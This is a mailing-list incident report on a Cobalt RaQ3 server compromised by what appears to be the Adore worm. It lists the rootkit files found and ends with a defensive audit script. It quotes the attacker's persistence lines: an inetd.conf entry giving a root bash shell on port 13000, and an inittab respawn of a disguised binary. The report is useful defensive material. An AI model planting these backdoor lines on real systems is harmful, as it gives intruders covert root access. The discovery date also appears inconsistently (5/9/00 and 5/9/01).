
[cobalt-users] Adore Worm experience on my Cobalt RaQ3



Summary:

On 5/9/00 we discovered our Cobalt webserver had been compromised.  I
suspect that egress was obtained via the ftpd or bind.  I have "mostly"
recovered, and am hardening the box as much as I can.  This appears to be
the Adore worm.  It deposits a few special binaries that I suspect a bot
used in IRC war games; regardless of what it does, it executes as root and I
cannot allow that.

Oh brave new world that has such people in it...

------------------------------------------
Details:

It is impossible to say when the computer was compromised; I can only say
that it was discovered on 5/9/01 about 2:30 PM after erratic behavior of the
system prompted the Web-Mistress to look into the box. None of her shell
accounts worked.

We called the colocation facility to reboot the box.  The admin password
did not work, but the other accounts worked.

We had the colocation facility reset the password with the "paper clip"
method.  We gained access, then started to nose around.

Looking at the box using ps and netstat showed nothing out of the ordinary.
Usage looked ok.  But I noticed that the sshd daemon was not showing.
Looking at the process information in /proc showed that ssh was running and
squid was running at /usr/man/man8/squid.  I killed the process and it
reappeared.  I gzipped it and it stopped.
Looking at the /etc/inittab I found the following:

pa:2345:respawn:/usr/man/man4/squid >> /dev/null

I then moved to the /etc/inetd.conf to discover:

13000 stream tcp nowait root /bin/bash /bin/bash -i

Not good!!! And a long session ensued of about 30 hours.

I noticed that tcp-wrappers was not behaving quite right.
So I restored net-tools and procps and built the latest tcp-wrappers.

And then I started to play a game of hunt the wumpus.  It truly helped to have
a box with nmap installed to scan for listeners.

I found the following treasures:

/dev/.recardo
/usr/lib/pt07
/usr/man/man1/pt07
/dev/?
/dev/cui220
/dev/cui/221
/sbin/ipchains-l

So I created a folder called hacked, and here are the contents:

ls -laR | more
.:
total 171
drwxr-xr-x   4 root     root         1024 May 11 00:58 .
drwxr-x---  12 root     root         1024 May 11 12:33 ..
drwxr-xr-x   2 33       root         1024 Feb 10 07:31 ...
drwxrwxr-x   2 root     root         1024 Feb 10 08:07 .ricardo
-rwxr-xr-x   1 root     root          663 Feb 10 07:55 cui220
-rwxr-xr-x   1 root     root          119 Feb 10 07:54 cui221
-rw-r--r--   1 root     root        20480 May 11 00:58 ipchains-l.tgz
-rwxr-xr-x   1 root     root        57896 Jun 18  1999 netstat
-r-xr-xr-x   1 root     root        60460 Apr  3  1999 ps
-rw-r--r--   1 root     root         9463 May 11 00:51 pt07.tgz
-rwxr-xr-x   1 33       root        14146 Jan 23 16:49 squid

...:
total 251
drwxr-xr-x   2 33       root         1024 Feb 10 07:31 .
drwxr-xr-x   4 root     root         1024 May 11 00:58 ..
-rwxr-xr-x   1 root     root        10495 Jan 17 14:13 .pine.out
-rwxr-xr-x   1 root     root        28856 Sep  3  2000 .synscan
-rwxr-xr-x   1 root     root        14319 Jan 22 16:43 .tty
-rwxr-xr-x   1 root     root        38742 Jan  2 14:11 .vani
-rw-r--r--   1 root     root         5448 Feb 10 07:31 adore.o
-rwxr-xr-x   1 root     root        14156 Feb 10 07:31 ava
-rwxr-xr-x   1 root     root        14017 Sep  3  2000 bnc
-rwxr-xr-x   1 root     root          327 Jan 23 17:54 bnc.conf
-rwxr-xr-x   1 1000     users       26908 Aug 15  2000 gen
-rwxr-xr-x   1 root     root        13136 Jan 18 12:23 nscan
-rwxr-xr-x   1 root     root          130 Jan 18 12:23 nscan.conf
-rwxr-xr-x   1 root     root        15284 Feb 10 07:31 pscan
-rwxr-xr-x   1 1000     users       36463 Aug 15  2000 rpcscan
-rwxr-xr-x   1 1250     users        8369 Sep  3  2000 slice2
-rwxr-xr-x   1 root     root        12208 Jul 30  2000 sup

.ricardo:
total 19
drwxrwxr-x   2 root     root         1024 Feb 10 08:07 .
drwxr-xr-x   4 root     root         1024 May 11 00:58 ..
-rw-rw-r--   1 root     root          414 Feb 10 08:08 a
-rwxrwxr-x   1 root     root        14017 Jan 21 07:59 bnc
-rw-rw-r--   1 root     root          414 Feb 10 08:13 bnc.conf

The following strings identify the binary that was left on my system:

    Welcome GiD
         .
  You are now r00t.
   Ph34r My Sk||n5
 /bin/sh


/dev/cui220 looked like a breadcrumb trail:

2 pt07
3 pt07
3 .synscan
3 rpcscan
4 rpcscan
3 bnc
4 bnc
5 bnc
3 slice2
4 slice2
5 slice2
6 slice2
3 eggdrop
4 eggdrop
5 eggdrop
6 eggdrop
7 eggdrop
2 sup
3 sup
4 sup
5 sup
6 sup
7 sup
8 sup
3 .vani
2 .pine.out
3 .pine.out
4 .pine.out
5 .pine.out
6 .pine.out
7 .pine.out
8 .pine.out
9 .pine.out
3 ipchains-l
3 ipchains-l
4 ipchains-l
5 ipchains-l
6 ipchains-l
7 ipchains-l
8 ipchains-l
9 ipchains-l
10 ipchains-l
3 nscan
4 nscan
5 nscan
6 nscan
7 nscan
8 nscan
9 nscan
10 nscan
11 nscan
3 squid
3 squid
3 squid
4 squid
5 squid
6 squid
7 squid
8 squid
9 squid
10 squid
11 squid
12 squid
1 sh
2 sh
3 sh
4 sh
5 sh
6 sh
7 sh
8 sh
9 sh
10 sh
11 sh
12 sh
13 sh
3 inetd

And /dev/cui221 looked like configuration data:

3 65531
3 8888
3 65534
4 6667
2 200.192
2 200.251
2 200.195
2 200.194
2 200.224
3 39168
3 5690
3 8888
3 65521
3 13000

How were we broken into?  Don't know.  I suspect bind or proftpd, but don't
know; the logs show me nothing.  There was an inconsistency between lastlog
and wtmp, but I was not smart enough to figure it out.

Did I find all of the treasures...maybe.  I have tightened up my system some
more until I get a chance to do a total reload, and in the meantime...verify
often and hope that this person gets caught!

jack
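The three checks jack did by hand above (a respawn entry in /etc/inittab pointing into /usr/man, a numeric-port service in /etc/inetd.conf that spawns a shell, and a process visible in /proc but not in ps) can be scripted against saved copies of the files. This is an added example, not code from the original post or from Cobalt; the function names and the file-argument convention are my own, and the sample inputs in the usage note are constructed.

```shell
#!/bin/sh
# Added example: audit helpers for the persistence tricks described in the
# post. Each function takes a file path so it can run on copies pulled from
# a suspect box, and exits 0 when it finds something worth looking at.

# inittab entries (id:runlevels:action:command) whose command lives in a
# place no daemon belongs: man pages, /dev, or a temp directory.
audit_inittab() {
    grep -E '^[^:#]*:[^:]*:(respawn|once|boot|sysinit):[[:space:]]*(/usr/man|/dev|/tmp|/var/tmp)/' "$1"
}

# inetd.conf entries (service socket proto wait user server args...) that
# either listen on a bare port number instead of a /etc/services name, or
# whose server program (field 6) is a shell. Comments and blanks skipped.
audit_inetd() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | awk '
        $1 ~ /^[0-9]+$/ || $6 ~ /\/(ba)?sh$/ { print; found = 1 }
        END { exit !found }'
}

# PIDs present in a /proc listing but missing from ps output, which is what
# a trojaned ps hides. Both arguments are files with one PID per line; take
# the two snapshots back to back, since a short-lived process that exits
# between them shows up as a false positive.
hidden_pids() {
    grep -vxFf "$1" "$2"
}
```

On a live box the PID snapshots come from `ps -eo pid --no-headers` and `ls /proc | grep -E '^[0-9]+$'`; on the post's inittab the first function returns exactly the `pa:2345:respawn:/usr/man/man4/squid` line and the second returns the `13000 ... /bin/bash -i` line.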